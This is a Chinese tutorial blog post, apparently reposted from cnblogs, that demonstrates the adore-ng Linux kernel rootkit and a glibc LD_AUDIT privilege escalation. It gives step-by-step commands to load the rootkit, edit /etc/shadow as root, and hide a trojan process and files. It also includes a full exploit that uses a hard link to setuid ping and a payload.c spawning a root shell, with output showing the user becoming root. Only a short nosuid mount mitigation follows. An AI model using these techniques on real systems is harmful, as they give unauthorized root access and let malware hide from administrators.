adore-ng笔记和Linux普通用户提权
官网:https://github.com/trimpsyw/adore-ng
安装:
[root@xuegod63 ~]# unzipadore-ng-master.zip
[root@xuegod63 ~]# cdadore-ng-master
[root@xuegod63 adore-ng-master]#rpm -ivh/mnt/Packages/kernel-devel-2.6.32-220.el6.x86_64.rpm
yum install gcc*
[root@xuegod63adore-ng-master]# make
[root@xuegod63adore-ng-master]# insmod adore-ng.ko #加载模块
测试,查看帮助:
[root@xuegod63adore-ng-master]# ./ava -h
Usage: ./ava {h,u,r,R,i,v,U}[file or PID]
I print info (secret UID etc)
h hide file #隐藏文件
u unhide file
r execute as root #可以提权,以root身份运行程序
R remove PID forever
U uninstall adore
i make PID invisible #隐藏进程。隐藏你的木马程序
v make PID visible
测试:准备环境,创建一个普通用户于测试。然后在普通用户上,通过ava命令,提权后,以root身份运行一个进程。
提权:提高自己在服务器中的权限。
[root@xuegod63 ~]# useradd tree
[root@xuegod63 ~]# echo 123456| passwd --stdin tree
Changing password for usertree
passwd: all authenticationtokens updated successfully.
例1: 通过ava命令提权。让普通用户tree可以获得root权限
[root@xuegod63adore-ng-master]# cp -r /root/adore-ng-master /tmp/
[root@xuegod63adore-ng-master]# chmod 777 /tmp/adore-ng-master/ -R
[root@xuegod63 adore-ng-master]#ssh tree@192.168.1.63 #以普通帐号登录
[tree@xuegod63 ~]$ cd/tmp/adore-ng-master/
[tree@xuegod63adore-ng-master]$ pwd
/tmp/adore-ng-master
[mk@xuegod63 adore-ng-master]$./ava I #查看基本信息,能弹出以下信息说明程序运行正常
56,500,500,56
Adore 1.56 installed. Goodluck.
ELITE_UID: 2618748389,ELITE_GID=4063569279, ADORE_KEY=fgjgggfd CURRENT_ADORE=56
实战: r 选项: execute as root #以root身份运行程序
[mk@xuegod63 adore-ng-master]$ll /etc/shadow
---------- 1 root root 1071Apr 7 10:17 /etc/shadow
[mk@xuegod63 adore-ng-master]$vim /etc/shadow
[mk@xuegod63 adore-ng-master]$ ./ava r vim /etc/shadow #编辑时,可以写入一些内容,测试是否可以正常写入
查看修改成功:
[root@xuegod63 ~]# vim/etc/shadow
另外,在别一个终端上查看,此进程的用户身份:
[root@xuegod63 ~]# ps -axu | grep shadow
Warning: bad syntax, perhaps abogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root 6874 0.1 0.1 10216 2924 pts/3 S+ 04:12 0:00 /usr/bin/vim /etc/shadow
root 6879 0.0 0.0 4024 692 pts/2 S+ 04:12 0:00 grep shadow
留后门,不让人看见?
实战2: 隐藏进程。隐藏你的木马程序
模拟一个木马程序:
[mk@xuegod63adore-ng-master]$ cat a.sh
#!/bin/bash
sleep 2000
[mk@xuegod63adore-ng-master]$ chmod +x a.sh
[mk@xuegod63adore-ng-master]$ ./a.sh &
查看:
[root@xuegod63 ~]# ps-axu | grep a.sh
Warning: bad syntax,perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ
tree 6339 0.0 0.1 106148 1184 pts/3 S 10:32 0:00 /bin/bash ./a.sh
隐藏进程
[mk@xuegod63adore-ng-master]$ ./ava i 6339 #隐藏进程
56,500,500,56
Adore 1.56 installed. Goodluck.
Made PID 6339 invisible.
[root@xuegod63 ~]# ps -axu |grep a.sh #查看
Warning: bad syntax, perhaps abogus '-'? See /usr/share/doc/procps-3.2.8/FAQ
root 10225 0.0 0.0 103300 852 pts/4 S+ 22:54 0:00 grep a.sh
实战3: 隐藏文件
[mk@xuegod63 adore-ng-master]$mkdir test
[mk@xuegod63 adore-ng-master]$cd test/
[mk@xuegod63 test]$ echo aaaa >a.php
[mk@xuegod63 test]$ ls -a
. .. a.php
隐藏文件
[mk@xuegod63 test]$/tmp/adore-ng-master/ava h a.php
56,500,500,56
Adore 1.56 installed. Goodluck.
File 'a.php' is now hidden.
查看:
[mk@localhost test]$ ls -a
. ..
[mk@xuegod63 test]$ cat a.php
aaaa
尝试:查找最近被的修改的文件
[mk@xuegod63 test]$touch b.php
[mk@xuegod63 test]$ ls
b.php
[mk@xuegod63 test]$find ./ -mtime -2
./
./b.php #找不到出来
有没有办法查看到a.php : 没有。 除非把rootkit木马程序关了
恢复出来:
[mk@xuegod63 test]$/tmp/adore-ng-master/ava u a.php
56,500,500,56
Adore 1.56 installed. Goodluck.
File 'a.php' is now visible.
[mk@xuegod63 test]$ ls -a
. .. a.php
总结:
1、通过rootkit提权
2、通过rootkit隐藏木马进程号
3、通过rootkit隐藏木马文件
创建一个让root用户都删除不了的木马文件
[root@xuegod63 ~]#lsattr b.txt
----i--------e- b.txt
[root@xuegod63 ~]#chattr -i b.txt
[root@xuegod63 ~]# rm-rf b.txt
实战2:Linux下普通用户提权
提权:你听不懂。 听深度,后期自己能做出来效果就可以
提权: 从普通用户提升到root权限
注:RHEL5到RHEL6.0 32位操作系统和64位操作系统都存在以下漏洞。
利用glibc库的漏洞,提权。
以一个普通用户登录
[root@xuegod63 ~]# su -mk
[mk@xuegod63 ~]$
suid : 当用户执行时命令a时,会以命令a的拥有者身份运行此命令。
[mk@xuegod63 ~]$ cd/tmp/
[hello@localhost tmp]$ls -ld /tmp/
drwxrwxrwt 11 root root4096 10-14 21:29 /tmp/
[hello@localhost tmp]$cd /tmp/
[hello@localhost tmp]$mkdir exploit //随便在tmp目录下创建一个文件夹exploit:利用
[mk@localhostadore-ng]$ ll /bin/ping
-rwsr-xr-x 1 root root35832 Apr 24 2009 /bin/ping
[hello@localhost tmp]$ln /bin/ping /tmp/exploit/target //创建/bin/ping 的一个硬链接,硬链接的名随便起
[hello@localhost tmp]$exec 3< /tmp/exploit/target
[hello@localhost tmp]$ls -l /proc/$$/fd/3
lr-x------ 1 hellohello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[hello@localhost tmp]$rm -fr /tmp/exploit/
[hello@localhost tmp]$ls -l /proc/$$/fd/3 //查看链接已经被删除
lr-x------ 1 hellohello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[hello@localhost tmp]$cat payload.c //写一个C语言程序
void__attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[hello@localhost tmp]$gcc -w -fPIC -shared -o /tmp/exploit payload.c //编译C程序
[hello@localhost tmp]$ls -l /tmp/exploit
-rwxrwxr-x 1 hellohello 4223 10-20 09:32 /tmp/exploit
[mk@xuegod63 tmp]$whoami
mk
[hello@localhost tmp]$LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhost tmp]#whoami
root
在RHEL6.1尝试时,前面几条命令都可以执行成功,在执行最后这条命令时报以下错误,并直接使用普通用户退出登录。
提示:对像$ORIGIN不能被作为审计接口加载
无法打开共享文件ject ;忽略
解决方法:
对 777 的目录做如下操作 , 可以控制你提权的 . 比如/tmp
# mount -o bind,nosuid/tmp /tmp
还需要把用户的家目录也用上面的方法打上补丁:
[root@xuegod63 ~]#mount -o bind,nosuid /home/mk /home/mk
修改就不行了,执行ln命令时提示以下错误。
[root@xuegod63 ~]# su -mk
[mk@xuegod63 ~]$ ln/bin/ping /tmp/ping
ln: creating hard link`/tmp/ping' => `/bin/ping': Invalid cross-device link
#报错,创建硬链接时,报错,无效的跨设备连接
注:查找权限是777的文件夹:
root@xuegod63 ~]# find/ -perm -777 -type d
/var/tmp
/dev/.mdadm
/dev/.udev
/dev/.udev/rules.d
/dev/shm
find:`/proc/9346/task/9346/fd/5': No such file or directory
find:`/proc/9346/task/9346/fdinfo/5': No such file or directory
find:`/proc/9346/fd/5': No such file or directory
find: `/proc/9346/fdinfo/5':No such file or directory
/tmp
/tmp/VMwareDnD
/tmp/.ICE-unix
/tmp/.X11-unix
普通用户的家目录/home/普通用户
注:
-perm mode:文件权限正好符合mode
-perm +mode:文件权限部分符合mode
-perm -mode: 文件权限完全符合mode
转载于:https://www.cnblogs.com/wanghuaijun/p/7768798.html
adore-ng笔记和Linux普通用户提权相关推荐
- 提权学习:Linux普通用户提权为root
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Linux普通用户提权为root 接下来直接看实例 Linux普通用户提权为root 我记得我以前用Linux的时候,忘记root密码是常 ...
- Windows和linux提权方法,Windows与Linux本地用户提权体验(一)
无论是Windows系统还是linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证.这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行Windows及Linux下的提权测 ...
- 103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.LINUX 内核漏洞提权 1.漏洞背景: 2.漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME ...
- 【用户——提权——权限管理】
用户--提权--权限管理 linux用户管理 用户基本概述 什么是用户 为什么需要用户 用户有哪些分类 查询用户的ID信息 用户相关配置文件 passwd文件 shadow文件 用户相关命令 添加用户 ...
- Dirty Pipe – Linux 内核本地提权漏洞
一.漏洞简介 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞.攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root ...
- Linux渗透与提权:技巧总结篇
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: /etc/passwd/etc/sha ...
- LINUX渗透与提权总结
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: 001 /etc/passwd 002 ...
- 绿盟科技 linux漏洞,绿盟科技发布LINUX内核本地提权漏洞技术分析与防护方案
Linux内核的内存子系统在处理写时拷贝(Copy-on-Write,缩写为COW)时存在条件竞争漏洞,导致可以破坏私有只读内存映射.一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,进 ...
- Linux sudo 命令提权
Linux sudo 命令提权 当我们需要用root用户来进行一些操作的时候,每次又不想切换到root用户下,可以给普通用户提权达来达目的. 1,修改配置文件 vim /etc/sudoers,在ro ...
最新文章
- 文本分类实战(七)—— Adversarial LSTM模型
- python实现抓取必应图片设置桌面
- SpringBoot 使用Swagger2打造在线接口文档(附源代码)
- hadoop win环境依赖winutils.exe等的gitee下载地址
- 如何快速解决虚拟机中的CentOS7无法上网的方式
- OpenCV基本mat重建的实例(附完整代码)
- 编译原理(一)之词法分析
- Visual Studio 2015 和 Apache Cordova 跨平台开发入门(一)
- Spring框架之Filter应用
- Windows批处理命令学习笔记(1)
- python安装pyqt4_如何使用pip在Windows上安装PyQt4?
- KDS加密软件的实际应用
- squid代理服务器的应用
- 计算机量子化学计算实验报告物化实验,量子化学计算方试验.doc
- 获取中国 省市区 js
- 女友闹别扭不用担心,python做个软件轻松哄好
- 互联网重提内容为王?学Netflix(奈飞)做好内容营销
- python教育数据挖掘_Python 数据分析 与 数据挖掘 (介绍篇)
- java程序设计之网络编程基础教程_Java程序设计之网络编程基础教程
- xposed微信红包